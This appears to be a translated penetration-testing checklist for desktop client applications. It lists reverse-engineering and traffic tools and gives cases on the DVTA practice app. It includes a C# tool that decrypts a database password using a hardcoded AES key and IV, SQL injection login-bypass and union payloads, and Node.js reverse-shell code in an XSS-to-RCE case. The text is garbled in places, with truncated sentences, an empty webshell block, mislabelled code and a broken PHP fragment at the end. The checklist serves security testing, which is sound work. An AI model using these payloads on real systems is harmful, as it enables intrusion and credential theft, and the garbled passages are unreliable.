Comprehensive Penetration Testing Checklist for PC Clients: Tools, Techniques, and Case Studies

Network security

0x00 Introduction

In recent years, the interaction between users and PC clients has become increasingly important. This trend is driven by the need for enhanced user

This project primarily targets penetration testing for PC clients (CS architecture). It combines personal testing experience with online resources to form a checklist. If you have any questions, please get in touch. We look forward to more contributions in techniques and case studies from everyone.

0x01 Overview

PC client, with a rich-featured graphical user interface, CS architecture.

0x02 Development Languages

C# (.NET), JAVA, DELPHI, C, C++ ……

0x03 Protocols

TCP, HTTP(S), TDS ……

0x04 Databases

Oracle, MSSQL, DB2 ……

0x05 Testing Tools

// Related tool downloads: https://github.com/theLSA/hack-cs-tools

dvta: a PC client practice range

ida pro: static analysis tool

ollydbg: dynamic analysis tool

CFF Explorer: PE file analysis

PEID: shell checking tool

exeinfope/studype: PE file analysis

wireshark: observe traffic

tcpview: observe TCP traffic

echo Mirage: intercept TCP traffic

burpsuite: HTTP(S) packet capture

proxifier: global proxy traffic

procmon: files and registry monitoring

regshot: registry change comparison

process Hacker: process analysis

RegfromApp: registry monitoring

WSExplorer: capture processes from the inter-year alliance

strings: view program strings

.NET [de]compilation:

dotpeek

de4dot

dnspy

ilspy

sae

ildasm

ilasm

Java decompilation

jad

jd-gui

jadx

dex2jar

Online versions:javare.cn

www.javadecompilers.com

Reflexil: assembly editor (can be used as an ilspy plugin)

Vcg: automated code audit tool

BinScope: binary analysis tool

0x06 Proxy Settings

Most clients lack proxy configuration functions, requiring manual global proxy setup. Here are two methods:

1) IE – Internet Settings – Connections – LAN Settings.

2) Proxy server/proxy server rules

// HTTP traffic can be conveniently tested with BurpSuite (set proxy server to Burp proxy address).

0x07 Testing Points

0.1 Information Gathering

Compilation information, development environment/language, protocols used, database, IP, obfuscation/encryption, packing, etc.

Case 0 – CFF viewing client information (e.g., compilation environment)

dvta

1. Reverse Engineering

Decompilation, source code leakage, hardcoded keys/passwords, encryption/decryption logic, role determination logic (0-admin, 1-normal user), backdoors, etc.

Case 0 – Decompile to obtain encryption and decryption logic and develop decryption tool

dvta

Through this logic and obtained information

Encrypted text: CTsvjZ0jQghXYWbSRcPxpQ ==

AES Key: J8gLXc454o5tW2HEF7HahcXPufj9v8k8

IV: fq20T0gMnXa6g0l4

Develop a decryption tool

“`javascriptusing System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows.Forms;using System.Security.Cryptography;namespace aesdecrypt{ public partial class aesdecrypt : Form { public aesdecrypt() { InitializeComponent(); } private void decrypt(object sender, EventArgs e) { String key = “J8gLXc454o5tW2HEF7HahcXPufj9v8k8”; String IV = “fq20T0gMnXa6g0l4”; String encryptedtext = “CTsvjZ0jQghXYWbSRcPxpQ==”; byte[] encryptedBytes = Convert.FromBase64String(encryptedtext); AesCryptoServiceProvider aes = new AesCryptoServiceProvider(); aes.BlockSize = 128; aes.KeySize = 256; aes.Key = System.Text.ASCIIEncoding.ASCII.GetBytes(key); aes.IV = System.Text.ASCIIEncoding.ASCII.GetBytes(IV); aes.Padding = PaddingMode.PKCS7; aes.Mode = CipherMode.CBC; ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV); byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length); String decryptedString = System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes); Console.WriteLine(“\n”); Console.WriteLine(“##########Decrypting Database password##########\n”); Console.WriteLine(“Decrypted Database password:” + decryptedString + “\n”); Console.WriteLine(“##########Done##########\n”); } }}“`

Case 1 – Decompile to modify code logic, allowing normal users to log in as administrators

dvta

1-Isadmin

0 Normaluser

Change 1 to 0 to determine as admin

2. Information Disclosure

Plain text sensitive information, sensitive files (e.g., xxx.config in installation directory).

Registry: Use regshot to compare client running (e.g., logging in) registry differences before and after.

Development debugging logging (e.g., dvta.exe >> log.txt)

process hacker View plaintext sensitive data in client memory (e.g., account passwords/keys).

strings directly view client strings (e.g., IP information).

View source code (e.g., on GitHub, Gitee, etc.)

Case 0 – Configuration sensitive information disclosure

dvta

Case 1 – Memory leakage of database account password

dvta

Case 2 – Source code containing hardcoded FTP account password

dvta

Case 3 – Development debugging log disclosure

dvta

Case 4 – Some systems save account passwords locally after login

//Example source from https://blog.csdn.net/weixin_30685047/article/details/95916065

3. Transmission Traffic

Wireshark / echo Mirage / burpsuite + nopeproxy / filler / charles

FTP and other protocols transmit account passwords in plaintext

SQL statements transmitted in plaintext (e.g., using crafted injection, privilege escalation, etc.)

Case 0 – SQL statements of a certain educational administration system are transmitted in plaintext, returning plaintext data

//Example source from wooyun

4. Other Vulnerabilities

Brute Force

Such as login functionality.

Username Enumeration

Case 0

SQL Statement Exposure

Case 0

SQL Injection

Such as login locations, universal password

xxx’ or ‘x’=’x

xxx’ or 1=1–

In input fields, construct closure error such as ‘,’) , %’), order by 100–, etc.

Use the displayed bits or error extraction of data, principle is the same as web injection, similar across different databases.

Case 0 – oracle injection

“`javascript’union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual–“`

Case 1 – MSSQL injection

“`javascript111′) and (select user)>0–“`

CSV Injection

For instance, when exporting Excel, input 1+1 and check for 2 after exporting.

Weak Password

Try combinations like admin 123456 etc.

XSS

For example, Electron, NodeWebKit, etc.

Case 0 – Chinese Ant Sword XSS to RCE

Environment: Win7 + PHPStudy (PHP5.6.27-nts) + Perl + NC + AntSword2.0.5

XSS Webshell:

“`javascript“`

WIN + Node.js:

Success

“`javascriptvar net = require(“net”), sh = require(“child_process”).exec(“cmd.exe”);var client = new net.Socket();client.connect(6677, “127.0.0.1”, function(){ client.pipe(sh.stdin); sh.stdout.pipe(client);sh.stderr.pipe(client); });?><?phpheader(“HTTP/1.1 500 Not Relevant reference

Share this